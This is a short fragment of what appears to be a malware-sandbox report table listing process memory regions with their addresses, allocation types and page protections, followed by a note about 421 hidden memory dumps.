trusted library allocation
|
page read and write
|
||
|
1B32FBBE000
|
trusted library allocation
|
page read and write
|
||
|
7DF4C4310000
|
trusted library allocation
|
page execute and read and write
|
||
|
5015ACF000
|
stack
|
page read and write
|
There are 421 hidden memdumps, click here to show them.